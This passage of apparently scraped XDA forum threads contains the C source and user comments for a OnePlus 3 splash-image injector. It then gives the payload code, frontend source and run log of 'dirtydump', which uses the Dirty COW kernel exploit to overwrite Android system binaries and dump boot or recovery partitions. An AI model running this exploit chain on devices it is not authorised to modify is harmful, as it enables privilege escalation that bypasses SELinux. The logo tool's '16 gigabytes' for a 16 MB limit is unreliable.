return isize + (blockSize - (isize % blockSize));
}
}
void Usage(){
fprintf(stdout, "Usage: OP3Inject -i \"input file\" [-l] | [-L] | [-d [-s]] | [-j \"image to be replaced\" [-b] | [-s]]\n\n");
fprintf(stdout, "Mandatory Arguments:\n\n");
fprintf(stdout, "\t-i \"C:\\xda\\logo.bin\"\n");
fprintf(stdout, "\t This is the logo.bin file to analyze or inject an image\n\n");
fprintf(stdout, "Optional Arguments:\n\n");
fprintf(stdout, "\t-d Decode all images into PNGs, (-s)wap parameter may be needed for proper color.\n");
fprintf(stdout, "\t-l Lower case 'L' is to display a short list of what is inside the input file.\n");
fprintf(stdout, "\t-L Upper case 'L' is for a more detailed list of logo.bin image contents.\n");
fprintf(stdout, "\t-b 'b' is used to tell the program to disregard width or height differences\n");
fprintf(stdout, "\t when encoding an image, the program also won't fail if it can't find a name\n");
fprintf(stdout, "\t that can't be found on the inject list when encoding images. This switch\n");
fprintf(stdout, "\t also keeps modified logo bins over 16 gb, instead of deleting them.\n");
fprintf(stdout, "\t-s 's' is used to swap RGB and BGR color order. Can be used on decoding or encoding.\n");
fprintf(stdout, "\t The default color order is BGR. Using the \"-s\" switch\n");
fprintf(stdout, "\t will result in a RGB color order. Bottom line: If you (-d)ecode the\n");
fprintf(stdout, "\t images (that have color) and the colors aren't right, then you should use (-s) to \n");
fprintf(stdout, "\t decode and inject images.\n");
fprintf(stdout, "\t-j \"image(s) to be replaced\"\n");
fprintf(stdout, "\t The image(s) name to be replaced as seen in the (-l)ist\n");
fprintf(stdout, "\t Multiple image names may be put after \"-j\"\n");
fprintf(stdout, "\t The names simply need to be separated by a space. The names also are not case\n");
fprintf(stdout, "\t sensitive, and it doesn't matter if you put the extension at the end of the name.\n");
fprintf(stdout, "\t You actually only need to put the first characters of the name.\nExample:\n");
fprintf(stdout, "\t OP3Inject -i \"your_logo.bin\" -j FHD \n\n");
fprintf(stdout, "\t This will inject a PNG for every name in the logo bin that begins with \"fhd\"\n");
return;
}
void PrintFileSize(uint32_t bytes){
float megaBytes = 0, kiloBytes = 0;
kiloBytes = (float)bytes / (float)TWOTOTHETEN;
megaBytes = kiloBytes / (float)TWOTOTHETEN;
if (kiloBytes < (float)TWOTOTHETEN){
fprintf(stdout, "\t%.2f KB\n", kiloBytes);
} else {
fprintf(stdout, "\t%.2f MB\n", megaBytes);
}
return;
}
uint32_t GetFileSize(FILE *temp){
fseek(temp, 0 , SEEK_END);
uint32_t fileSizeZ = ftell(temp);
return(fileSizeZ);
}
int32_t main(int32_t argc, char** argv){
int32_t c;
int16_t h, i , j , k = 0;
FILE *originalLogoBin = NULL, *modifiedLogoBin = NULL;
uint8_t *inputFile = NULL;
uint8_t *injectNames[MAXOFFSETS];
int16_t decodeAllOpt = 0;
int16_t inject = 0;
int16_t listFile = 0;
uint16_t numberOfOffsets = 0, injected = 0;
for(i = 0; i < MAXOFFSETS; i++){
injectNames[i] = NULL;
}
fprintf(stdout, "__________________________________________________________-_-\n");
fprintf(stdout, "Logo Injector v1.4\n\nWritten By Makers_Mark @ XDA-DEVELOPERS.COM\n");
fprintf(stdout, "_____________________________________________________________\n\n");
while ((c = getopt (argc, (char**)argv, "sSj:J:hHbBdDlLi:I:")) != -1){
switch(c)
{
case 'l':
listFile = 1;
break;
case 'L':
decodeAllOpt = 1;
convertToPNG = 0;
break;
case 'i':
case 'I':
inputFile = (uint8_t*)optarg;
break;
case 'b':
case 'B':
badAss = 1;
break;
case 'j':
case 'J':
h = optind - 1 ;
uint8_t *nextArg;
while(h < argc){
inject = 1;
nextArg = (uint8_t*)strdup(argv[h]);
h++;
if(nextArg[0] != '-'){
injectNames[k++] = nextArg;
} else {
break;
}
}
optind = h - 1;
break;
case 'd':
case 'D':
decodeAllOpt = 1 ;
break;
case 's':
case 'S':
rgb2bgr = -1 ;
break;
case 'h':
case 'H':
Usage();
return 0;
break;
default:
Usage();
return 0;
break;
}
}
if (inputFile == NULL){
Usage();
return 0;
}
fprintf(stdout, "FILE: %s\n_____________________________________________________________\n\n", inputFile);
if (rgb2bgr == 1){
fprintf(stdout, "BGR is the color order. Use \"-s\" switch to change it to RGB.\n\n");
} else {
fprintf(stdout, "RGB is the color order. Use \"-s\" switch to change it to BGR.\n\n");
}
if ((originalLogoBin = fopen((const char*)inputFile, "rb")) == NULL){
fprintf(stderr, "%s could not be opened\n", inputFile);
return 0;
}
if (!IsItALogo(originalLogoBin)){
fprintf(stdout, "\nThis is NOT a valid Logo.bin\n\n");
fclose(originalLogoBin);
return 0;
}
if (!IsItTheNewStyle(originalLogoBin)){
fprintf(stdout, "\nThis is the old style logo.bin\n\n");
fclose(originalLogoBin);
return 0;
}
numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
IMAGEHEAD *imageHeaders = ParseHeaders(originalLogoBin, numberOfOffsets);
if (listFile){
ListFileDetails(originalLogoBin);
return 1;
}
if(inject){
uint32_t ihMainOffsets[MAXOFFSETS];
uint8_t found = 0, exitFlag = 0;
for (i = 0; i < MAXOFFSETS ; i++){
ihMainOffsets[i] = 0;
}
for (j = 0; j < k ; j++){
for (i = 0 ; i < numberOfOffsets ; i++ ){
if((strcasecmp((const char*)imageHeaders[i].name, (const char*)injectNames[j]) == 0) ||
(strncasecmp((const char*)imageHeaders[i].name, (const char*)injectNames[j], strlen((const char*)injectNames[j])) == 0)){
found = 1;
break;
} else {
found = 0;
}
}
if (!found){
fprintf(stdout, "ERROR: \"%s\" is not in the logo bin !!!!\n", injectNames[j]);
exitFlag = 1;
}
}
if ((exitFlag) && (!badAss)){
fclose(originalLogoBin);
exit(0);
}
memcpy(&ihMainOffsets , &imageHeaders[0].offsets, SIZEOFLONGINT * MAXOFFSETS);
fseek(originalLogoBin, 0, SEEK_SET);
if ((modifiedLogoBin = fopen("modified.logo.bin", "wb+")) == NULL){
fclose(modifiedLogoBin);
fclose(originalLogoBin);
fprintf(stderr, "modified.logo.bin could not be opened\n");
return 0;
}
for (i = 0 ; i < numberOfOffsets ; i++ , injected = 0 ){
for (j = 0; j < k ; j++){
if((strcasecmp((const char*)imageHeaders[i].name, (const char*)injectNames[j]) == 0) ||
(strncasecmp((const char*)imageHeaders[i].name, (const char*)injectNames[j], strlen((const char*)injectNames[j])) == 0)){
if (InjectNewStyle(originalLogoBin, imageHeaders , numberOfOffsets, imageHeaders[i].name, i, modifiedLogoBin, ihMainOffsets) == 0){
fprintf(stderr, "Error: Injecting %s\n", imageHeaders[i].name);
fclose(originalLogoBin);
fclose(modifiedLogoBin);
return 0;
}
if ( i != numberOfOffsets - 1 ){
fseek(originalLogoBin, imageHeaders[0].offsets[i+1], SEEK_SET);
}
injected = 1;
break;
}
}
if (!injected){
Copy(originalLogoBin , imageHeaders, numberOfOffsets, i, modifiedLogoBin);
}
}
if (GetNumberOfOffsets(modifiedLogoBin) != numberOfOffsets){
fprintf(stderr, "ERROR: The number of offsets doesn't match the Original file!!\n");
fclose(modifiedLogoBin);
if (!badAss){
unlink("modified.logo.bin");
}
exit(0);
}
fclose(modifiedLogoBin);
fprintf(stdout, "\n\nContents of the NEW \"modified.logo.bin\":\n");
fprintf(stdout, "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n");
FILE *newModified;
if ((newModified = fopen("modified.logo.bin", "rb")) == NULL){
fclose(originalLogoBin);
fprintf(stderr, "modified.logo.bin could not be opened\n");
return 0;
}
ListFileDetails(newModified);
fprintf(stdout, "\n\n_____________________________________________________________\nOriginal filesize: ");
PrintFileSize(GetFileSize(originalLogoBin));
fprintf(stdout, "Modified filesize: ");
PrintFileSize(GetFileSize(newModified));
fprintf(stdout, "-------------------------------------------------------------\n");
if (GetFileSize(newModified) > 0x1000000){
fprintf(stdout, "\nTHE MODIFIED.LOGO.BIN IS LARGER THAN 16 GIGABYTES!\n");
fprintf(stdout, "THE SPLASH PARTITION ON THE ONEPLUS 3 IS NOT BIG \n");
fprintf(stdout, "ENOUGH TO HOLD THIS MODIFIED LOGO!\n");
if (!badAss){
fclose(newModified);
unlink("modified.logo.bin");
return 0;
}
}
fclose(originalLogoBin);
fclose(newModified);
return 1;
}
if (decodeAllOpt){
DecodeLogoBin(originalLogoBin, imageHeaders);
fclose(originalLogoBin);
return 1;
}
fclose(originalLogoBin);
return 1;
}
Thank you so much for this! Tested and working great: https://plus.google.com/+PeteBest444/posts/S4T124taYmJ
How can I backup my original logo.bin file?
matze19999 said:
How can I backup my original logo.bin file?
Click to expand...
Click to collapse
The logo.bin you supply isn't ever changed by the program, it is just modified on your computer, then reinstalled on the phone. Unless you are talking about acquiring the logo.bin in the first place? In that case check out this guide. The partition that you'll be trying to get is the "splash" partition, and that is your "logo.bin":good:
How can I backup my original logo.bin file?
Click to expand...
Click to collapse
access adb and input code
Code:
adb shell dd if=/dev/block/sde17 of=/sdcard/partition/LOGO.bin
adb pull /sdcard/LOGO.bin
makers_mark said:
The logo.bin you supply isn't ever changed by the program, it is just modified on your computer, then reinstalled on the phone. Unless you are talking about acquiring the logo.bin in the first place? In that case check out this guide. The partition that you'll be trying to get is the "splash" partition, and that is your "logo.bin":good:
Click to expand...
Click to collapse
Does this mean we could potentially port this over to the OP3 and retain the smooth/flickerless transition from the splash screen to the bootanimation? http://forum.xda-developers.com/moto-e-2015/development/mod-nexus-6p-logo-bin-bootanimation-t3262923
kentexcitebot said:
Does this mean we could potentially port this over to the OP3 and retain the smooth/flickerless transition from the splash screen to the bootanimation? http://forum.xda-developers.com/moto-e-2015/development/mod-nexus-6p-logo-bin-bootanimation-t3262923
Click to expand...
Click to collapse
If you wanted to use this logo injector to put a Google splash in your OP3 logo.bin so it matches a Google boot animation then I don't see why not! No porting needed as such, just extract the logo from the Nexus logo.bin, make it 1080x1920 and have at it!
Tapatalked that shiznit.
I cant flash my logo.bin.... "fastboot flash logo logo.bin" doesnt work error:
failed (remote: partition label doesn`t exist )
Bootloader is unlocked and device is decrypted.
I can flash the logo.bin via twrp...
Can someone please help?
matze19999 said:
I cant flash my logo.bin.... "fastboot flash logo logo.bin" doesnt work error:
failed (remote: partition label doesn`t exist )
Bootloader is unlocked and device is decrypted.
I can flash the logo.bin via twrp...
Can someone please help?
Click to expand...
Click to collapse
try capital letter? LOGO
dlhxr said:
try capital letter? LOGO
Click to expand...
Click to collapse
Thanks bro, now it works!!
I love this program, thanks bro!
Splash screen for FreedomOS users.
With white "FreedomOS" text: https://drive.google.com/file/d/0B-0rLZ5HEnOQdW9KOUw4LWJ2cGM/view?usp=sharing
Thanks @makers_mark for this tool !
I have compiled a linux version, see here
https://gitlab.com/Nevax/FreedomOS/blob/master/build/tools/op3injector
Flashed FreedomOS which came with a splash screen with no warning while flashing, could someone provide me the stock logo.bin file? Thanks in advance.
Thanks a lot for your work!! Will flashing this remove this Bootloader unlock warning??
arvindgr said:
Thanks a lot for your work!! Will flashing this remove this Bootloader unlock warning??
Click to expand...
Click to collapse
nope
Got "logo.bin could not be opened" error when using op3inject -i logo.bin -d. Can someone help me out?
R3Lax1 said:
Flashed FreedomOS which came with a splash screen with no warning while flashing, could someone provide me the stock logo.bin file? Thanks in advance.
Click to expand...
Click to collapse
Me too, want to go away from the freedom OS splash screen
Edit:
Found a flashable zip at freedom OS FAQs
@makers_mark is there any way to make -j compatible with directories? I have built this binary for android to work with my app and I already managed to add support for custom output directories but -j does not support directory names at all!
While this: "LogoInjector -i files/LOGO.bin -j 1-logo.png 4-fastboot.png" works fine, this: "LogoInjector -i files/LOGO.bin -j files/1-logo.png files/4-fastboot.png" does not... it throws an error saying: "files/1-logo.png is not in the logo bin" because it's actually looking for the string "files/1-logo.png" in the logo.bin and not "1-logo.png".
I tried fixing it but was unable to do so

[TOOL-TESTING] dirtydump (a way to dump boot or recovery for every un-rooted device)

Hi,
A little tool or frontend that I've made and share to the community.
Intro
If you are like me :
Searching a way to backup your device, try some tools like SP Flash Tool, or MTK Droid Tools (for generating a Scatter File).
I have found a lot of thread, but I've allways got a dead end or a risk to brick the device (Never take a risk to brick your device if no stock rom available or backup).
A few days ago, i've found this thread : https://forum.xda-developers.com/v20/development/h918-recowvery-unlock-v20-root-shell-t3490594
It's not for my device, it's maybe not for your device, but help a lot to do our need. This exploit work for everyone and what to do the little tools below.
What's the change ?
Instead of that does jcadduono (a big thanks to him), via applypatch, it don't patch the recovery partition to run an Android in Permissive mode, my applypatch only open and read the boot or recovery partition and display all data to logging (binary converted to hex value).
Yes, I know, logging is not for that, it's realy hard-core, but it's the only way working. I've tried with socket, but SELinux in Enforced mode don't allow this.
You can see my recowvery-applypatch.c below :
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/stat.h>
#define APP_NAME "recowvery"
#define HOST_NAME "applypatch"
#ifdef DEBUG
#include <android/log.h>
#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, APP_NAME, __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { __android_log_print(ANDROID_LOG_ERROR, APP_NAME, __VA_ARGS__); fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#else
#define LOGV(...) { printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#endif
#define SEP LOGV("------------")
#include "bootimg.h"
/* Time delay in microsecond for next loop (1000 = 1ms)
* 250 is good for every PC
* (you can try with 0 to boost the process, but you can have an <unexpected EOF>)
*/
#define DELAY_T 250
void delay(long t)
{
if (t == 0)
return;
long timens = t * 1000;
nanosleep((const struct timespec[]){{0, timens}}, NULL);
}
/*
* Search in *str the word *word.
* &rslt => Result, a sort of substr version of *str from 0 to the last char of the searched *word if found.
* &len => Length of &rslt.
*
* Return 0 if found or -1 if not found.
* (A substr like)
*/
int findStr(char *str, char *word, char** rslt, int* len)
{
int i = 0;
int j = 0;
int allmatch = 0;
char *temp;
*len = 0;
for (i = 0; i < (int)strlen(str); i++)
{
if (str[i] == word[0])
{
allmatch = 0;
for (j = 0; j < (int)strlen(word); j++)
{
if (str[i + j] != word[j])
{
allmatch = 1;
break;
}
}
if (allmatch == 0)
{
*len = i + strlen(word);
break;
}
}
}
if (*len != 0)
{
temp = malloc(*len);
for (i = 0; i < *len; i++)
temp[i] = str[i];
*rslt = temp;
return 0;
}
return -1;
}
/*
* run "mount" and find "/by-name/" from result.
* if matched, fill path var
* return 0 if success else -1
*/
int getBlockDevice(char** path)
{
FILE* cmd;
char br[512];
char* search = "/by-name/";
char* tmp;
int slength = 0;
cmd = popen("mount 2>&1", "r");
if (cmd)
{
/* Read result and try to find the first corresponding mount point */
while(fgets(br, sizeof br, cmd) != NULL)
{
/* If found, log the result */
if (findStr(br, search, &tmp, &slength) != -1)
{
/* Append "boot" (your can replace this by "recovery", "system") at the end */
sprintf(*path, "%srecovery", tmp);
break;
}
}
fclose(cmd);
}
else
{
LOGE("ERROR Getting filesystem mountpoint");
}
if (slength > 0)
return 0;
else
return -1;
}
int main(int argc, char **argv)
{
int ret = 0;
int i = 0;
LOGV("Welcome to %s! (%s)", APP_NAME, HOST_NAME);
char *blockDev = malloc(256);
if (getBlockDevice(&blockDev) == -1)
{
LOGE("ERROR : Could not find FileSystem mount point.");
ret = errno;
goto oops;
}
else
{
LOGV("BLOCK_DEVICE : %s", blockDev);
SEP;
}
/*
* Sometimes <applypatch> run before <dirtycow> finish its process that cause our device not ready to start <adb logcat -s recowvery>
* and we have to wait more than 3min...
* A little sleep of 30 sec ensure that our device is ready.
*/
LOGV("The process start in 30s");
sleep(30);
byte rb[32];
char *content = malloc(256);
FILE *fp;
size_t nread;
fp = fopen(blockDev, "r");
if (fp) {
LOGV("*** DUMP START ***");
while ((nread = fread(rb, 1, sizeof rb, fp)) > 0)
{
sprintf(content, "HEXDUMP = [");
for (i = 0; i < (int)nread; i++)
{
if (i == 0)
sprintf(content, "%s%.2x", content, rb[i]);
else
sprintf(content, "%s,%.2x", content, rb[i]);
}
sprintf(content, "%s];", content);
LOGV("%s", content);
/* sleep to prevent any unexpected EOF with with pipe stream */
delay(DELAY_T);
}
if (ferror(fp)) {
ret = errno;
LOGE("*** DUMP ERROR ***");
LOGE("Error while reading the file...");
}
LOGV("*** DUMP END ***");
fclose(fp);
}
else
{
LOGV("Can't read the file...");
ret = errno;
goto oops;
}
return 0;
oops:
LOGE("*** DUMP ERROR ***");
LOGE("Error %d: %s", ret, strerror(ret));
LOGE("Exiting...");
return ret;
}
Don't laugh please, I am very new in C
Ok, but about the tool ?
The tool is a frontend and easy to use, it copy exploit files for you, run exploit, read logging from adb and do the revert of applypatch (Convert hex to binary and write them to the image file) and finaly reboot your device when it's finish.
An example here :
Code:
~/Documents/dirtydump/bin/Debug$ ./dirtydump boot
***************
**** Init *****
***************
adb push ./bin/dirtycow /data/local/tmp
159 KB/s (9984 bytes in 0.061s)
adb push ./bin/recowvery-applypatch_boot /data/local/tmp
234 KB/s (10200 bytes in 0.042s)
adb push ./bin/recowvery-applypatch_recovery /data/local/tmp
238 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process64 /data/local/tmp
240 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process32 /data/local/tmp
411 KB/s (17992 bytes in 0.042s)
adb shell chmod 0777 /data/local/tmp/dirtycow
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery
adb shell chmod 0777 /data/local/tmp/recowvery-app_process64
adb shell chmod 0777 /data/local/tmp/recowvery-app_process32
* Android x64 version detected.
**********************
**** Run Exploit *****
**********************
adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot
warning: new file size (10200) and file old size (74712) differ
size 74712
[*] mmap 0x7faa6a7000
[*] exploit (patch)
[*] currently 0x7faa6a7000=10102464c457f
[*] madvise = 0x7faa6a7000 74712
[*] madvise = 0 1048576
[*] /proc/self/mem 1031798784 1048576
[*] exploited 0x7faa6a7000=10102464c457f
adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64
warning: new file size (10200) and file old size (22456) differ
size 22456
[*] mmap 0x7f8f303000
[*] exploit (patch)
[*] currently 0x7f8f303000=10102464c457f
[*] madvise = 0x7f8f303000 22456
[*] madvise = 0 1048576
[*] /proc/self/mem 2071986176 1048576
[*] exploited 0x7f8f303000=10102464c457f
*********************************
**** adb logcat -s recowvery ****
*********************************
--------- beginning of main
--------- beginning of system
--------- beginning of crash
01-24 15:40:37.206 5266 5266 I recowvery: Welcome to recowvery! (app_process64)
01-24 15:40:37.206 5266 5266 I recowvery: ------------
01-24 15:40:37.206 5266 5266 I recowvery: Current selinux context: u:r:zygote:s0
01-24 15:40:37.206 5266 5266 I recowvery: Set context to 'u:r:system_server:s0'
01-24 15:40:37.206 5266 5266 I recowvery: Current security context: u:r:system_server:s0
01-24 15:40:37.206 5266 5266 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-24 15:40:37.211 5266 5266 I recowvery: ------------
01-24 15:40:37.211 5266 5266 I recowvery: Recovery flash script should have started!
01-24 15:40:37.211 5266 5266 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-24 15:40:37.211 5266 5266 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)...
01-24 15:40:37.242 5269 5269 I recowvery: Welcome to recowvery! (applypatch)
01-24 15:40:37.272 5269 5269 I recowvery: BLOCK_DEVICE : /dev/block/platform/mtk-msdc.0/11230000.msdc0/by-name/boot
01-24 15:40:37.272 5269 5269 I recowvery: ------------
01-24 15:40:37.272 5269 5269 I recowvery: The process start in 30s
Start writing to file...
Block read : 524288 (Size : 16777216)
Finish
Image file saved here :
./boot.img
Rebooting your device...
************************
**** Reboot Device *****
************************
How to use ?
Extract all files from archive attached below in a directory of our choice.
./dirtydump boot : dump boot partition and store it to ./boot.img
./dirtydump recovery : dump recovery partition and store it to ./recovery.img
When all done, you have all to make your Custom Recovery for your device.
Requirements
<dirtycow> capable device.
Working adb (adb devices to check)
Linux distribution.
Source code
Code:
#include <iostream>
#include <stdio.h>
#include <regex>
using namespace std;
#define BOOT 0
#define RECOVERY 1
#define ANDROID_64 "64"
#define ANDROID_32 "32"
#ifdef __linux__
#define DIRECTORY_SEPARATOR "/"
#elif __APPLE__
#define DIRECTORY_SEPARATOR "/"
#else
#define DIRECTORY_SEPARATOR "\\"
#endif
typedef unsigned char byte;
static string appDirectory;
static string arch;
static FILE *fsout;
static bool startwrite = false;
static int ncrash = 0;
static int nBlock = 0;
static long currentSize = 0;
// Shorter regex is possible, but I prefer like that.
static regex rs("^.+I recowvery: (\\*\\*\\* DUMP START \\*\\*\\*)\\s+"); // Used to start writting binary file
static regex rl("^.+I recowvery: HEXDUMP = \\[([^\\]]+)\\];\\s+"); // Used to match all data block, and populate < datalist >
static regex rf("^.+I recowvery: (\\*\\*\\* DUMP END \\*\\*\\*)\\s+"); // Used to end writting, and exit infinit loop
static regex re("^.+I recowvery: (\\*\\*\\* DUMP ERROR \\*\\*\\*)\\s+"); // Used to intercept error from < recowvery-applypatch >
static regex radbe("^error:(.+)\\s+"); // ADB cmd error
static regex rarch("^.+(aarch64).*\\s+"); // Get arch from <uname -a>
/**
* Run command
* return : 0 if success else -1 if error
**/
int runcmd(string cmd)
{
char rslt[256];
int cmdv = 0;
FILE *fc = popen(cmd.c_str(), "r");
/* Redirect stderr to stdout */
cmd.append(" 2>&1");
// To remove the \n or \r\n at the end.
regex rcmdline("^(.+)\\s+");
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rcmdline))
cout << regex_replace(string(rslt), rcmdline, "$1") << endl;
// If error matched, return -1
if (regex_match(rslt, radbe))
{
cmdv = -1;
break;
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running '" << string(cmd) << "'" << endl;
return -1;
}
return cmdv;
}
/**
* Used to split string
* s : string to split (in)
* delim : used char for split (in)
* elems : string array result (out)
**/
void split(const string &s, char delim, vector<string> &elems) {
stringstream ss;
ss.str(s);
string item;
while (getline(ss, item, delim)) {
elems.push_back(item);
}
}
/**
* Used to split string
* s : string to split (in)
* delim : char delimeter (in)
* return : vector string
**/
vector<string> split(const string &s, char delim) {
vector<string> elems;
split(s, delim, elems);
return elems;
}
/** Convert hex string to byte array **/
void string_to_bytearray(std::string str, unsigned char* &array, int& size)
{
int length = str.length();
// make sure the input string has an even digit numbers
if(length%2 == 1)
{
str = "0" + str;
length++;
}
// allocate memory for the output array
array = new unsigned char[length/2];
size = length/2;
std::stringstream sstr(str);
for(int i=0; i < size; i++)
{
char ch1, ch2;
sstr >> ch1 >> ch2;
int dig1, dig2;
if(isdigit(ch1)) dig1 = ch1 - '0';
else if(ch1>='A' && ch1<='F') dig1 = ch1 - 'A' + 10;
else if(ch1>='a' && ch1<='f') dig1 = ch1 - 'a' + 10;
if(isdigit(ch2)) dig2 = ch2 - '0';
else if(ch2>='A' && ch2<='F') dig2 = ch2 - 'A' + 10;
else if(ch2>='a' && ch2<='f') dig2 = ch2 - 'a' + 10;
array[i] = dig1*16 + dig2;
}
}
/**
* Get architecture type
* Run <adb shell uname -a> and find the word : aarch64
* If found return <ANDROID_64> else <ANDROID_32>
**/
string getArchType()
{
char rslt[256];
string val;
FILE *fc = popen("adb shell uname -a", "r");
// To remove the \n or \r\n at the end.
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rarch))
{
cout << "* Android x64 version detected." << endl;
val = string(ANDROID_64);
}
else
{
cout << "* Android x32 version detected." << endl;
val = string(ANDROID_32);
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running 'adb shell uname -a'" << endl;
}
return val;
}
/**
* Display help
**/
void help()
{
cout << "dirtydump boot | recovery" << endl;
cout << "Usage :" << endl;
cout << "\tdirtydump boot : Dump device boot partition and save it to boot.img." << endl;
cout << "\tdirtydump recovery : Dump device recovery partition and save it to recovery.img." << endl << endl;
cout << "Information :" << endl;
cout << "\tThis app use the same exploit explained here : " << endl;
cout << "\thttps://github.com/jcadduono/android_external_dirtycow" << endl;
cout << "\tThe only difference is by the <applypatch>, instead of patching," << endl;
cout << "\tit read your boot / recovery partition." << endl;
cout << "\tConvert all data to hex value, and display it." << endl;
cout << "\tDuring the process, the app read all data through" <<endl;
cout << "\t<adb logcat -s recowvery> and do the reverse," << endl;
cout << "\tconvert all hex value to binary, and write it to a file." << endl;
cout << "\tBecause your device is like crashing, this app reboot" << endl;
cout << "\tautomaticaly when the process is finished." << endl;
cout << endl;
}
/**
* Initialize process.
* Push required files to your device and apply a chmod to them and exit.
**/
int init()
{
cout << "***************" << endl;
cout << "**** Init *****" << endl;
cout << "***************" << endl << endl;
string files[] = {"dirtycow",
"recowvery-applypatch_boot",
"recowvery-applypatch_recovery",
"recowvery-app_process64",
"recowvery-app_process32"};
string cmdlist[] = {"adb shell chmod 0777 /data/local/tmp/dirtycow",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process64",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process32"};
char cmd[128];
/* Push files to the device */
for(auto s : files)
{
sprintf(cmd, "adb push %s%sbin%s%s /data/local/tmp", appDirectory.c_str(), DIRECTORY_SEPARATOR, DIRECTORY_SEPARATOR, s.c_str());
cout << string(cmd) << endl;
if (runcmd(cmd) != 0)
return -1;
}
/* Apply chmod to the pushed files */
for(auto s : cmdlist)
{
cout << string(s) << endl;
if (runcmd(s) != 0)
return -1;
}
arch = getArchType();
if (arch.empty())
return -1;
return 0;
}
/**
* Apply exploit to applypatch (for boot or process) and app_process64
**/
int runExploit(int v)
{
cout << "**********************" << endl;
cout << "**** Run Exploit *****" << endl;
cout << "**********************" << endl << endl;
string cmdlist[] = {
"", // For applypatch
"" // For app_process
};
if (v == BOOT)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot");
else if (v == RECOVERY)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_recovery");
else
return -1;
if (arch == ANDROID_64)
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64";
else
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process32 /data/local/tmp/recowvery-app_process32";
for(auto s : cmdlist)
{
cout << s << endl;
if (runcmd(s) != 0)
return -1;
}
return 0;
}
/**
* reboot device from adb
**/
int rebootDevice()
{
cout << "************************" << endl;
cout << "**** Reboot Device *****" << endl;
cout << "************************" << endl << endl;
return runcmd(string("adb reboot"));
}
/**
* Function that do the stuff
* If a line contain *** DUMP START *** it start to get all hex value in HEXDUMP = [a1,e2,b4,ect.] and convert to binary before writing to output file.
* All other line are :
* <*** DUMP ERROR ***> : Error during the process, or your device is disconnected, no more battery...
* <*** DUMP END ***> : Dumping is end / end of process.
* <Other lines> : Displayed
**/
int displayLogAndConvertData(string line)
{
/**
* If an unexpected EOF from recowvery-applypatch or if no <pipe>...
* We can't receive a null string, so break the loop, close fsout, and exit the program.
**/
if (line.empty())
{
cout << string("* < null > received !") << endl;
cout << string("Try again...") << endl;
return -1;
}
/**
* *** DUMP START ***
* set startwrite = true to write parsed data to fsout
**/
if (regex_match(line, rs))
{
startwrite = true;
cout << "Start writing to file..." << endl;
}
/**
* Parse all string received if match
* Note :
* It's possible to have matched string before intercept DUMP START,
* If we convert now, it's a good idea to have a broken output file.
**/
if (startwrite && regex_match(line, rl))
{
string s = regex_replace(line, rl, "$1");
vector<string> data = split(s, ',');
for (int c = 0; c < (int)data.size(); c++)
{
try
{
byte *b = NULL;
int sb;
string_to_bytearray(data[c], b, sb);
fwrite(b, 1, sb, fsout);
}
catch (const exception &ex)
{
cout << endl;
cout << string("** Exception **") << endl;
cout << string(" - When convert : ") << data[c] << endl;
cout << string(" - Message : ") << ex.what() << endl;
}
}
nBlock++;
currentSize = nBlock * 32;
cout << "\r";
cout << "Block read : " << nBlock << " (Size : " << currentSize << ")";
}
/**
* Display the other lines (for debuging, logging...)
**/
else if (!regex_match(line, rl) && (!regex_match(line, rf) && !startwrite) && line.length() > 1)
{
cout << line;
}
/**
* *** DUMP END ***
* Flush and close fsout, inform the user, and break the loop.
**/
if (startwrite && regex_match(line, rf))
{
cout << endl << "Finish" << endl;
startwrite = false;
return 1;
}
/**
* *** DUMP ERROR ***
* An error intercepted from ADB, close fsout, set start to false.
* < applypatch > will restart every 3 min.
* We break the loop after 3 errors.
**/
if (regex_match(line, re))
{
cout << std::string("* Error received from ADB *") << std::endl;
startwrite = false;
if (ncrash == 3)
{
cout << std::string("* Too many tries, please check your < recowvery-applypatch.c > and try again.") << std::endl;
return -1;
}
cout << std::string("* Be patient, recowvery-applypatch will restart in a few minutes.") << std::endl;
ncrash++;
}
return 0;
}
/**
* run <adb logcat -s recowvery> and send line by line to <displayLogAndConvertData> function
**/
int readFromLogcat()
{
cout << "*********************************" << endl;
cout << "**** adb logcat -s recowvery ****" << endl;
cout << "*********************************" << endl << endl;
char buff[1024];
int prc = 0;
FILE *fc = popen("adb logcat -s recowvery", "r");
if (fc)
{
while(fgets(buff, sizeof buff, fc) != NULL)
{
prc = displayLogAndConvertData(string(buff));
// Error occuring
if (prc == -1)
{
cerr << "Error during the process !" << endl;
break;
}
